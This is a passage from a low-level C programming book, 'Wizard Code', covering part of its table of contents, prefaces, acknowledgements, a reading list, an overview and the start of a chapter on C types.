3.10.5 register . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 41
3.11 Type Casts . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 41
4 Pointers 43
4.1 void Pointers . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 43
4.2 Pointer Basics . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 43
4.3 Pointer Arithmetics . . . . . . . . . . . . . . . . . . . . . . . . . . . 44
4.4 Object Size . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 44
5 Logical Operations 47
5.1 C Operators . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 47
5.1.1 AND . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 47
5.1.2 OR . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 47
5.1.3 XOR . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 48
5.1.4 NOT . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 48
5.1.5 Complement . . . . . . . . . . . . . . . . . . . . . . . . . . 48
6 Memory 49
6.1 Alignment . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 49
6.2 Word Access . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 49
7 System Interface 51
7.1 Signals . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 51
7.2 Dynamic Memory . . . . . . . . . . . . . . . . . . . . . . . . . . . . 52
7.2.1 Heap . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 54
7.2.2 Mapped Memory . . . . . . . . . . . . . . . . . . . . . . . . 54
8 C Analogous to Assembly 55
8.1 ’Pseudo-Assembly’ . . . . . . . . . . . . . . . . . . . . . . . . . . . 55
8.1.1 Pseudo Instructions . . . . . . . . . . . . . . . . . . . . . . . 55
8.2 Addressing Memory . . . . . . . . . . . . . . . . . . . . . . . . . . 56
8.3 C to Assembly/Machine Translation . . . . . . . . . . . . . . . . . . 56
8.3.1 Branches . . . . . . . . . . . . . . . . . . . . . . . . . . . . 56
8.3.1.1 if - else if - else . . . . . . . . . . . . . . . . . . . 56
8.3.1.2 switch . . . . . . . . . . . . . . . . . . . . . . . . 57
CONTENTS 7
8.3.2 Loops . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 58
8.3.2.1 for . . . . . . . . . . . . . . . . . . . . . . . . . . 58
8.3.2.2 while . . . . . . . . . . . . . . . . . . . . . . . . . 59
8.3.2.3 do-while . . . . . . . . . . . . . . . . . . . . . . . 59
8.3.3 Function Calls . . . . . . . . . . . . . . . . . . . . . . . . . 60
9 C Run Model 63
9.1 Code Execution . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 64
9.1.1 Program Segments . . . . . . . . . . . . . . . . . . . . . . . 64
9.1.1.1 Minimum Segmentation . . . . . . . . . . . . . . . 64
9.1.2 TEXT Segment . . . . . . . . . . . . . . . . . . . . . . . . . 64
9.1.3 RODATA Segment . . . . . . . . . . . . . . . . . . . . . . . 64
9.1.4 DATA Segment . . . . . . . . . . . . . . . . . . . . . . . . . 65
9.1.5 BSS Segment . . . . . . . . . . . . . . . . . . . . . . . . . . 65
9.1.6 DYN Segment . . . . . . . . . . . . . . . . . . . . . . . . . 65
9.1.7 STACK Segment . . . . . . . . . . . . . . . . . . . . . . . . 65
9.2 C Interface . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 66
9.2.1 Stack . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 66
9.2.1.1 Stack Pointer . . . . . . . . . . . . . . . . . . . . . 66
9.2.2 Frame Pointer . . . . . . . . . . . . . . . . . . . . . . . . . . 66
9.2.3 Program Counter aka Instruction Pointer . . . . . . . . . . . 66
9.2.4 Automatic Variables . . . . . . . . . . . . . . . . . . . . . . 66
9.2.5 Stack Frame . . . . . . . . . . . . . . . . . . . . . . . . . . 67
9.2.6 Function Calls . . . . . . . . . . . . . . . . . . . . . . . . . 67
9.2.6.1 Function Arguments . . . . . . . . . . . . . . . . . 68
9.2.6.2 Return Value . . . . . . . . . . . . . . . . . . . . . 68
9.2.6.3 i386 Function Calls . . . . . . . . . . . . . . . . . 69
9.3 Nonlocal Goto; setjmp() and longjmp() . . . . . . . . . . . . . . . . 71
9.3.1 Interface . . . . . . . . . . . . . . . . . . . . . . . . . . . . 72
9.3.1.1 <setjmp.h> . . . . . . . . . . . . . . . . . . . . . . 72
9.3.2 Implementation . . . . . . . . . . . . . . . . . . . . . . . . . 72
9.3.2.1 IA-32 implementation . . . . . . . . . . . . . . . . 73
9.3.2.2 X86-64 Implementation . . . . . . . . . . . . . . . 74
9.3.2.3 ARM Implementation . . . . . . . . . . . . . . . . 77
9.3.3 setjmp.c . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 79
V Computer Basics 81
10 Basic Architecture 85
10.1 Control Bus . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 85
10.2 Memory Bus . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 85
10.3 V on Neumann Machine . . . . . . . . . . . . . . . . . . . . . . . . . 85
10.3.1 CPU . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 86
10.3.2 Memory . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 86
10.3.3 I/O . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 86
10.4 Conclusions . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 86
8 CONTENTS
VI Numeric Values 89
11 Machine Dependencies 93
11.1 Word Size . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 93
11.2 Byte Order . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 94
12 Unsigned Values 97
12.1 Binary Presentation . . . . . . . . . . . . . . . . . . . . . . . . . . . 97
12.2 Decimal Presentation . . . . . . . . . . . . . . . . . . . . . . . . . . 97
12.3 Hexadecimal Presentation . . . . . . . . . . . . . . . . . . . . . . . 98
12.4 Octal Presentation . . . . . . . . . . . . . . . . . . . . . . . . . . . . 99
12.5 A Bit on Characters . . . . . . . . . . . . . . . . . . . . . . . . . . . 99
12.6 Zero Extension . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 99
12.7 Limits . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 100
12.8 Pitfalls . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 100
12.8.1 Underflow . . . . . . . . . . . . . . . . . . . . . . . . . . . 100
12.8.2 Overflow . . . . . . . . . . . . . . . . . . . . . . . . . . . . 100
13 Signed Values 103
13.1 Positive Values . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 103
13.2 Negative Values . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 103
13.2.1 2’s Complement . . . . . . . . . . . . . . . . . . . . . . . . 103
13.2.2 Limits . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 104
13.2.3 Sign Extension . . . . . . . . . . . . . . . . . . . . . . . . . 104
13.2.4 Pitfalls . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 104
13.2.4.1 Underflow . . . . . . . . . . . . . . . . . . . . . . 104
13.2.4.2 Overflow . . . . . . . . . . . . . . . . . . . . . . . 104
14 Floating Point Numeric Presentation 105
14.1 Basics . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 105
14.2 IEEE Floating Point Presentation . . . . . . . . . . . . . . . . . . . . 106
14.2.1 Significand; ’Mantissa’ . . . . . . . . . . . . . . . . . . . . . 106
14.2.2 Exponent . . . . . . . . . . . . . . . . . . . . . . . . . . . . 106
14.2.3 Bit Level . . . . . . . . . . . . . . . . . . . . . . . . . . . . 106
14.2.4 Single Precision . . . . . . . . . . . . . . . . . . . . . . . . 107
14.2.4.1 Zero Significand . . . . . . . . . . . . . . . . . . . 107
14.2.4.2 Non-Zero Significand . . . . . . . . . . . . . . . . 107
14.2.5 Double Precision . . . . . . . . . . . . . . . . . . . . . . . . 108
14.2.5.1 Special Cases . . . . . . . . . . . . . . . . . . . . 108
14.2.6 Extended Precision . . . . . . . . . . . . . . . . . . . . . . . 108
14.2.6.1 80-Bit Presentation . . . . . . . . . . . . . . . . . 108
14.3 i387 Assembly Examples . . . . . . . . . . . . . . . . . . . . . . . . 109
14.3.1 i387 Header . . . . . . . . . . . . . . . . . . . . . . . . . . . 109
14.3.2 i387 Source . . . . . . . . . . . . . . . . . . . . . . . . . . . 109
VII Machine Level Programming 115
15 Machine Interface 117
15.1 Compiler Specification . . . . . . . . . . . . . . . . . . . . . . . . . 117
CONTENTS 9
15.1.1 <cdecl.h> . . . . . . . . . . . . . . . . . . . . . . . . . . . . 117
15.2 Machine Definition . . . . . . . . . . . . . . . . . . . . . . . . . . . 118
15.2.1 <mach.h> . . . . . . . . . . . . . . . . . . . . . . . . . . . . 118
16 IA-32 Register Set 119
16.1 General Purpose Registers . . . . . . . . . . . . . . . . . . . . . . . 119
16.2 Special Registers . . . . . . . . . . . . . . . . . . . . . . . . . . . . 119
16.3 Control Registers . . . . . . . . . . . . . . . . . . . . . . . . . . . . 119
17 Assembly 121
17.1 AT&T vs. Intel Syntax . . . . . . . . . . . . . . . . . . . . . . . . . 121
17.1.1 Syntax Differences . . . . . . . . . . . . . . . . . . . . . . . 122
17.1.2 First Linux Example . . . . . . . . . . . . . . . . . . . . . . 122
17.1.3 Second Linux Example . . . . . . . . . . . . . . . . . . . . . 123
17.1.3.1 Stack Usage . . . . . . . . . . . . . . . . . . . . . 124
18 Inline Assembly 127
18.1 Syntax . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 127
18.1.1 rdtsc() . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 127
18.2 Constraints . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 129
18.2.1 IA-32 Constraints . . . . . . . . . . . . . . . . . . . . . . . . 129
18.2.2 Memory Constraint . . . . . . . . . . . . . . . . . . . . . . . 129
18.2.3 Register Constraints . . . . . . . . . . . . . . . . . . . . . . 129
18.2.4 Matching Constraints . . . . . . . . . . . . . . . . . . . . . . 129
18.2.4.1 Example; incl . . . . . . . . . . . . . . . . . . . . 129
18.2.5 Other Constraints . . . . . . . . . . . . . . . . . . . . . . . . 130
18.2.6 Constraint Modifiers . . . . . . . . . . . . . . . . . . . . . . 130
18.3 Clobber Statements . . . . . . . . . . . . . . . . . . . . . . . . . . . 130
18.3.1 Memory Barrier . . . . . . . . . . . . . . . . . . . . . . . . 130
19 Interfacing with Assembly 131
19.1 alloca() . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 131
19.1.1 Implementation . . . . . . . . . . . . . . . . . . . . . . . . . 132
19.1.2 Example Use . . . . . . . . . . . . . . . . . . . . . . . . . . 133
VIII Code Style 135
20 A View on Style 137
20.1 Concerns . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 137
20.2 Thoughts . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 138
20.3 Conventions . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 139
20.3.1 Macro Names . . . . . . . . . . . . . . . . . . . . . . . . . . 139
20.3.2 Underscore Prefixes . . . . . . . . . . . . . . . . . . . . . . 140
20.3.3 Function Names . . . . . . . . . . . . . . . . . . . . . . . . 140
20.3.4 Variable Names . . . . . . . . . . . . . . . . . . . . . . . . . 140
20.3.5 Abbreviations . . . . . . . . . . . . . . . . . . . . . . . . . . 141
20.4 Naming Conventions . . . . . . . . . . . . . . . . . . . . . . . . . . 143
20.5 Other Conventions . . . . . . . . . . . . . . . . . . . . . . . . . . . 144
10 CONTENTS
IX Code Optimisation 147
21 Execution Environment 149
21.1 CPU Internals . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 149
21.1.1 Prefetch Queue . . . . . . . . . . . . . . . . . . . . . . . . . 149
21.1.2 Pipelines . . . . . . . . . . . . . . . . . . . . . . . . . . . . 149
21.1.3 Branch Prediction . . . . . . . . . . . . . . . . . . . . . . . . 149
22 Optimisation Techniques 151
22.1 Data Dependencies . . . . . . . . . . . . . . . . . . . . . . . . . . . 151
22.2 Recursion Removal . . . . . . . . . . . . . . . . . . . . . . . . . . . 152
22.3 Code Inlining . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 153
22.4 Unrolling Loops . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 154
22.4.1 Basic Idea . . . . . . . . . . . . . . . . . . . . . . . . . . . . 154
22.5 Branches . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 155
22.5.1 if - else if - else . . . . . . . . . . . . . . . . . . . . . . . . . 155
22.5.2 switch . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 155
22.5.2.1 Duff’s Device . . . . . . . . . . . . . . . . . . . . 155
22.5.3 Jump Tables . . . . . . . . . . . . . . . . . . . . . . . . . . 157
22.6 Bit Operations . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 158
22.6.1 Karnaugh Maps . . . . . . . . . . . . . . . . . . . . . . . . . 159
22.6.2 Techniques and Tricks . . . . . . . . . . . . . . . . . . . . . 159
22.7 Small Techniques . . . . . . . . . . . . . . . . . . . . . . . . . . . . 160
22.7.1 Constant Folding . . . . . . . . . . . . . . . . . . . . . . . . 160
22.7.2 Code Hoisting . . . . . . . . . . . . . . . . . . . . . . . . . 160
22.8 Memory Access . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 161
22.8.1 Alignment . . . . . . . . . . . . . . . . . . . . . . . . . . . 161
22.8.2 Access Size . . . . . . . . . . . . . . . . . . . . . . . . . . . 161
22.8.2.1 Alignment . . . . . . . . . . . . . . . . . . . . . . 161
22.8.3 Cache . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 162
22.8.3.1 Cache Prewarming . . . . . . . . . . . . . . . . . . 162
22.9 Code Examples . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 162
22.9.1 pagezero() . . . . . . . . . . . . . . . . . . . . . . . . . . . 162
22.9.1.1 Algorithms . . . . . . . . . . . . . . . . . . . . . . 163
22.9.1.2 Statistics . . . . . . . . . . . . . . . . . . . . . . . 169
22.10Data Examples . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 179
22.10.1 Bit Flags . . . . . . . . . . . . . . . . . . . . . . . . . . . . 179
22.10.2 Lookup Tables . . . . . . . . . . . . . . . . . . . . . . . . . 179
22.10.3 Hash Tables . . . . . . . . . . . . . . . . . . . . . . . . . . . 180
22.10.4 The V-Tree . . . . . . . . . . . . . . . . . . . . . . . . . . . 180
22.10.4.1 Example Implementation . . . . . . . . . . . . . . 180
22.11Graphics Examples . . . . . . . . . . . . . . . . . . . . . . . . . . . 189
22.11.1 Alpha Blending . . . . . . . . . . . . . . . . . . . . . . . . . 190
22.11.1.1 C Routines . . . . . . . . . . . . . . . . . . . . . . 191
22.11.1.2 MMX Routines . . . . . . . . . . . . . . . . . . . 195
22.11.1.3 Cross-Fading Images . . . . . . . . . . . . . . . . 197
22.11.2 Fade In/Out Effects . . . . . . . . . . . . . . . . . . . . . . . 197
CONTENTS 11
X Code Examples 201
23 Zen Timer 203
23.1 Implementation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 203
23.1.1 Generic Version; gettimeofday() . . . . . . . . . . . . . . . . 203
23.1.2 IA32 Version; RDTSC . . . . . . . . . . . . . . . . . . . . . 204
24 C Library Allocator 205
24.1 Design . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 205
24.1.1 Buffer Layers . . . . . . . . . . . . . . . . . . . . . . . . . . 205
24.1.2 Details . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 206
24.2 Implementation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 207
24.2.1 UNIX Interface . . . . . . . . . . . . . . . . . . . . . . . . . 207
24.2.2 Source Code . . . . . . . . . . . . . . . . . . . . . . . . . . 209
A Cheat Sheets 247
A.1 C Operator Precedence and Associativity . . . . . . . . . . . . . . . 248
B A Bag of Tricks 249
C Managing Builds with Tup 259
C.1 Overview . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 259
C.2 Using Tup . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 260
C.2.1 Tuprules.tup . . . . . . . . . . . . . . . . . . . . . . . . . . 260
C.2.2 Tup Syntax . . . . . . . . . . . . . . . . . . . . . . . . . . . 260
C.2.3 Variables . . . . . . . . . . . . . . . . . . . . . . . . . . . . 260
C.2.4 Rules . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 261
C.2.5 Macros . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 262
C.2.6 Flags . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 262
C.2.7 Directives . . . . . . . . . . . . . . . . . . . . . . . . . . . . 262
12 CONTENTS
Part II
Ideas
13

15
I think this book should take a closer look on ARM assembly; ARM processors are very
common in systems such as smart phones, and provide a power- and budget-friendly
way to get into computing for people such as our children. One page to check out is
http://www.raspberrypi.org/ ;
the Raspberry Pi seems to be a quite useful, ultra-low cost computer with USB ports,
Ethernet, and other modern features. I would strongly recommend it for projects such
as learning assembly programming. A big thank you forJeremy Sturdivant for pro-
viding me a Raspi. :D
16
Part III
Preface
17

19
Draft 4
Draft number 4 contains fixes in implementation of the C library nonlocal goto interface
with setjmp() and longjmp() functions. The assembly statements are now declared
__volatile__ and as single assembly statement to keep them safer from enemies such as
compiler optimisations as suggested by the GNU C Compiler info page as well as some
friendly folks on IRC on Freenode. :) In other words the code should be more robust
and reliable now. Notice how elegant the ARM implementation is; ARM assembly is so
cool it makes me want to program in assembly, something rare to nonexistent on most
PC architectures. I wonder if Intel and friends should release stripped-down versions
of their instruction sets in new CPU modules and back the plan up with support from
C compilers and other software. Books such as the Write Great Code series by Randall
Hyde,
see:http://www.writegreatcode.com/
could have suggestions for minimal versions of the wide-spread X86 instruction sets;
I’d look into using mostly IA-32 andX86-64 operations. As per competition, I’d give
everything I have for access to 64-bit ARM workstations ; hopefully some shall pop
up in the market in due time...
Draft 2
This draft, version 2, has some rewordings, fixes typos and mistakes, and cleans a few
small things up. I found some mistakes in the code snippets as well.
20
Chapter 1
Forewords
This book started as a somewhat-exhaustive paper on computer presentation of integral
numeric values. As time went on, I started combining the text with my older and new
ideas of how to teach people to know C a bit deeper. I’m in the hopes this will make
many of the readers more fluent and capable C programmers.
1.1 First Things
Dedicated to my friends who have put up with me through the times of good and bad
and all those great minds behind good software such as classic operating systems and
computer games.
Be strong in the spirit,
the heart be thy guide,
Love be thy force,
life be thy hack.
1.1.1 Thank You
Big thanks to everyone who’s helped me with this book in the form of comments and
suggestions; if you feel I have forgotten to include your name here, please point it out...
As I unfortnately forgot to write some names down when getting nice feedback on IRC,
I want to thank the IRC people on Freenode collectively for helping me make the book
better.
Dale ’swishy’ Anderson
Craig ’craig’ Butcher
Ioannis Georgilakis
Matthew ’kinetik’ Gregan
Hisham ’CodeWarrior’ Mardam Bey
21
22 CHAPTER 1. FOREWORDS
Dennis ’dmal’ Micheelsen
Andrew ’Deimos’ Moenk
Michael ’doomrobo’ Rosenberg
Martin ’bluet’ Stensgård
Jeremy ’jercos’ Sturdivant
Vincent ’vtorri’ Torri
Andrew ’awilcox’ Wilcox
Timo Yletyinen
1.1.2 Preface
Wizard Code
Wizard Code is intended to provide a close look on low-level programming using the
ISO C and sometimes machine-dependent assembly languages. The idea is to gather
together information it took me years to come by into a single book. I have also in-
cluded some examples on other types of programming. This book is GNU- and UNIX-
friendly.
1.1.3 Goals
One of the goals of this book is to teach not only how to optimise code but mostly how
to write fast code to start with. This shows as chapters dedicated to optimisation topics
as well as performance measurements and statistics for some of the code in this book.
I hope this book satisfies both budding young programmers and experienced ones.
Have fun and keep the curious spirit alive.
1.1.4 Rationale
Why C?
One of the reasons I chose C as the language of preference is that it’s getting hard
to find good information on it; most new books seem to concentrate on higher-level
languages such as Java, Perl, Python, Ruby, and so on - even new books on C++ don’t
seem to be many these days. Another reason for this book is that I have yet to see a
book on the low-level aspects of C as a close-to-machine language.
Know the Machine
I think every programmer will still benefit from knowing how the machine works at the
lowest level. As a matter of fact, I consider this knowledge crucial for writing high-
performance applications, including but not limited to operating system kernels and
system libraries.
GNU & UNIX
1.1. FIRST THINGS 23
Where relevant, the example programs and other topics are UNIX- centric. This is
because, even though things are getting a bit awkward in the real world, UNIX is, deep
in its heart, a system of notable elegance and simplicity.
As they’re practically de facto standards today, I chose to use the GNU C Compiler
and other GNU tools for relevant parts of this book. For the record, Linux has been my
kernel of choice for one and a half decades. Some of the freely available programming
tools such as Valgrind are things you learn to rely on using Linux.
1.1.5 C Language
1.1.5.1 Overview
Personal View
I consider the C language the biggest contribution to software ever.
C is Low-Level
C is a low-level programming language. It was designed to have an efficient memory
abstraction - memory addresses are represented as pointers. Basic C operations map
to common machine instructions practically one-to-one. More complex operations are
consistently implemented in the standard library and system libraries. The runtime
requirements are very small. There exists a minimalistic but efficient standard library
that is a required part of C implementations. I think it’s good to say it shares much of
the elegance of early versions of UNIX.
C is Simple
C is a simple language. It doesn’t take long to learn the base for the whole language,
but it takes a long while to master it; assuming mastering it is a possibility.
C is Powerful
C is a powerful language. Pretty much no other language, short of assembly and C++,
lets you do everything C does - for the good and bad.
If you can’t do it in C, do it in assembly.
“If you can’t do it in assembly, it’s not worth doing.” C has long been the language of
choice for programmers of operating system kernels, scientific applications, computer
games, graphical applications, and many other kinds of software. There are plenty of
new languages and a bit of everything for everyone around, but C has kept its place as
what I call the number one language in the history of computer programming. What-
ever it is that you do, you have almost total control of the machine. Mixed with a bit
of inline and very rarely - unless you want to - raw assembly lets you do practically
everything you can with a microprocessor.
1.1.5.2 History
The Roots
24 CHAPTER 1. FOREWORDS
The roots of the C language lead to the legendary AT&T Bell Laboratories around the
turn of the 1960’s and 1970’s. Dennis Ritchie and other system hackers, most notably
Ken Thompson, needed a relatively machine-independent language to make it easier to
implement their new operating system, UNIX, in a more portable way.
Legend has it that UNIX actually started from a project whose purpose was to create
a computer game for an old PDP machine. I guess games aren’t all bad for inspira-
tion; another story tells that FreeBSD’s Linux emulation started as an attempt to make
’Frisbee’ run Linux versions of Doom.
1.1.5.3 Future
System Language
C is a traditional system language, and will very likely - even hopefully - continue
its existence as the language of choice for low-level programmers. Operating system
kernels can be implemented as stand-alone programs, but still require some assem-
bly programming. Most if not all common compilers allow relatively easy mixing of
assembly-language statements with C code; with a bit of care, you can command the
machine with its native instructions from C code quite easily and seamlessly.
Minimalistic Approach
With its minimalistic runtime requirements, machine-friendly data and code presenta-
tion, and relative ease of implementing custom libraries, C makes a great language for
development on embedded systems. Even though C is a great language for program-
ming high-speed applications for the desktop, the crazy amount of CPU horsepower
in modern PCs often makes other, higher-level languages more desirable for desktop
application development. However, typical embedded devices such as mobile phones
have more dire requirements for code speed and size. Hence, I predict a long and pros-
perous life for the C language, which many of us love - and sometimes hate - with
passion. :)
Code Speed
On the desktop, C still has its place in development of multimedia and other appli-
cations with extreme speed requirements. C excels at things such as direct hardware
access.
System Language
As a system language, C is and, in my opinion, should be an obvious choice for devel-
oping operating system kernels and other system software with.
1.1.6 KISS Principle
Simplicity
The KISS principle - Keep It Simple, Silly/Stupid - states that simplicity is a key goal
and that complexity should be avoided; in this case, particularly in computer software
development. Perhaps it also hints, in this context, at the ease of creating programs no
one else can understand.
1.1. FIRST THINGS 25
Elegance
It’s not necessarily obvious how much work it takes to find the essence of problems
being solved. Software developers had better not be judged in terms of how many
code lines they can produce - a much better measure would be how few lines they can
solve problems with. What the number of code lines doesn’t reveal is how many dead
ends and mediocre solutions it required to come up with a hopefully elegant and clean
solution.
Do What You Need to
To summarize the KISS principle for software development, do what you need to and
only what you need to. The simpler and fewer your operations, the faster the code. The
fewer lines of code, the fewer bugs.
1.1.7 Software Development
One-Man Projects
There are as many ways to develop software as there are software developers. I’m keen
on one-man projects, perhaps mostly because I’m still learning. In fact, I think one
of the really cool things about software development is that you never run out of new
things to learn. The field of software is relatively new and still taking form. New ways
to solve problems are being invented all the time.
The good things about one-man projects include no communication overhead and the
possibility for one person to know the whole system inside-out. Implementation and
design can be done simultaneously and mistakes fixed as they emerge.
Philosophy
For software development, as well as all creative work, I suggest following the way of
the empty mind. Close out all unnecessary distractions, become one with what you do,
think it, feel it, do it. Find total concentration with nothing but the task at hand in your
mind.
Art
Software is written expression, information, knowledge - software is art.
1.1.8 Conclusions
Essence
To develop great software, look for the essence of things. Keep your data structures
and code simple. Experiment with solutions, learn from the bad ones, try new ones.
Even though there may be no perfection, it’s still a good thing to reach for.
Statement
C is alive and a-rockin’!
26 CHAPTER 1. FOREWORDS
1.2 Suggested Reading
Books
Author(s) Book & ISBN
Booth, Rick Inner Loops
0-201-47960-5
Hyde, Randall WRITE GREAT CODE, V olume 1: Understanding the Machine
1-59327-003-8
Hyde, Randall WRITE GREAT CODE, V olume. 2: Thinking Low-Level, Writing High-Level
1-59327-003-8
Lamothe, Andre Black Art of 3D Game Programming
1-57169-004-2
Lions, John Lions’ Commentary on UNIX 6th Edition with Source Code
1-57398-013-7
Maxfield, Clyde The Definitive Guide to How Computers do Math
0-471-73278-8
Warren, Henry S. Hacker’s Delight
0-201-91465-4
Chapter 2
Overview
A Look at C
This books starts with a look at the C programming language. It’s not written to be
the first course on C, but instead for programmers with some knowledge of the lan-
guage. The readers will get a grasp of some aspects of the ’new’ version of the lan-
guage (’C99’, ISO/IEC 9899) as well as other language basics. You will gain in-depth
knowledge of C’s stack-based execution, i.e. how code operates at machine level.
There is a bit of information about using C for system programming (signals, mem-
ory model) too, including a reasonably good standard library (malloc-style) dynamic
memory allocator. Pointers have their own chapter.
Compiler Optimisations
For most code in this book, the GCC flag -Ois the best optimisation level to use.
At times, the code may run slower if you use -O2 and beyond. Where specific opti-
misations need to be enabled or disabled, I try to hint you at it. In particular, some
routines depend on ’standard’ use of frame pointer, hence it’s necessary to give GCC
the-fno-omit-frame-pointer flag for building correct code.
Basic Computer Architecture
Next we shall move on to basic computer architecture, followed by chapters describing
how computers represent numerical data internally. I will cover things such as integer
overflows and underflows; hopefully this could make spotting some of the more exotic
bugs easier. We are going to take a somewhat-quick look at how IEEE standard floating
point values are represented as well.
C and Assembly
The book continues with lower-level programming. We will see examples of special
compiler attributes (e.g. __packed__ ,__aligned__ ) that give us more control on our
code’s behavior. There’s a chapter on i386 machine architecture. We’ll learn a bit about
i386 assembly in general and using it with GCC and the other GNU tools in particular.
We will take a look at inline assembly and learn how to implement the setjmp() and
longjmp() standard library functions; these are one of the trickiest parts to implement
in a standard library in some ways.
27
28 CHAPTER 2. OVERVIEW
Code Style
There is a part in this book dedicated to code style to emphasize it’s an important aspect
of software development.
Code Optimisation
Code optimisation, as one of the things I’m keen on about programming, has a dedi-
cated set of chapters. We will first take a quick look at some machine features and then
roll our sleeves and start looking at how to write fast code. The Examples section has
a couple of pretty neat graphics algorithms. We implement simple tools to measure the
speed of our code in the section Zen Timer ; the name Zen timer originally came from
Michael Abrash who has worked on such classic pieces of software as Quake .
A Bag of Tricks
As an easter egg to those of you who enjoy coding tricks, there’s a chapter called A Bag
of Tricks . There we take a look at some often quite-creative small techniques gathered
from sources such as the legendary MIT HAKMEM , the book Hacker’s Delight by
Henry S. Warren of IBM, as well as other books and the Internet. The implementations
are by myself and it would be nice to get comments on them.
The i386
Next in this book, we shall get deeper into the world of the i386 as well as take a look
at its details from the perspective of kernel programmers.
Author’s Comments
All in all, I have written about things I learnt during the course of the last decade or
so. Instead of being highly theoretical, I tried to write a book which concentrates on
’practical’ things, shows some interesting tricks, and perhaps gives you deeper insight
to the world of computers. I hope this book makes some of you better programmers.
With that being said, let’s start rockin’ and a-rollin’! :)
Part IV
Notes on C
29

Chapter 3
C Types
This section doesn’t attempt to be a primer on C types; instead, I cover aspects I con-
sider to be of importance for low-level programming.
3.1 Base Types
The system-specific limits for these types are defined in <limits.h> .
It is noteworthy that you cannot use sizeof() at preprocessing time . Therefore, system
software that depends on type sizes should use explicit-size types or machine/compiler-
dependent declarations for type sizes, whichever strategy is feasible for the situation.
TODO: different data models (LP64, LLP64, ...)
Type Typical Size Origin
char 8 bits C89
short 16 bits C89
int 32 bits C89
long 32 or 64 bits C89
long long 64 bits C99; used widely before
Common Assumptions
Please note that the typical sizes are by no means carved in stone, even though such
assumptions are made in too many places. The day someone decides to break these
assumptions will be judgment day in the software world.
Native Words
Note that the typical size for long tends to be 32 bits on machines with 32-bit [max-
imum] native word size, 64 bits on 64-bit architectures. Also note that the i386 CPU
and later 32-bit CPUs in the Intel-based architectures do support a way to present 64-
bit values using two registers. One particular source of problems when porting from
32-bit to 64-bit platforms is the type int. It was originally designed to be a ’fast word’,
but people have used it as ’machine word’ for ages; the reason for so many trouble
31
32 CHAPTER 3. C TYPES
is that it tends to be 32-bit on 64-bit architectures (as well as 32-bit). Luckily, that’s
mostly old news; you can use specified-size types introduced in C99.
Char Signedness
The signedness of char is compiler-dependent; it’s usually a good idea to use unsigned
char explicitly. These types can be declared signed orunsigned , as in unsigned char ,
to request the desired type more explicitly. The type long long existed before C99 in
many compilers, but was only standardised in C99. One problem of the old days was
code that wasn’t ’8-bit clean’ because it represented text as [signed] chars. Non-ASCII
text presentations caused problems with their character values greater than 127 (0x7f
hexadecimal).
3.2 Size-Specific Types
Fewer Assumptions
One of the great things about C99 is that it makes it easier, or, should I say, realistically
possible, to work when you have to know sizes of entities. In the low-level world, you
basically do this all the time.
3.2.1 Explicit-Size Types
The types listed here are defined in <stdint.h> .
The advent of C99 brought us types with explicit widths. The types are named uintW_t
for unsigned, and intW_t for signed types, where W indicates the width of the types
in bits . These types are optional.
Unsigned Signed
uint8_t int8_t
uint16_t int16_t
uint32_t int32_t
uint64_t int64_t
These types are declared in <stdint.h> . There are also macros to declare 32-bit and 64-
bit constants; INT32_C(), UINT32_C(), INT64_C() and UINT64_C(). These macros
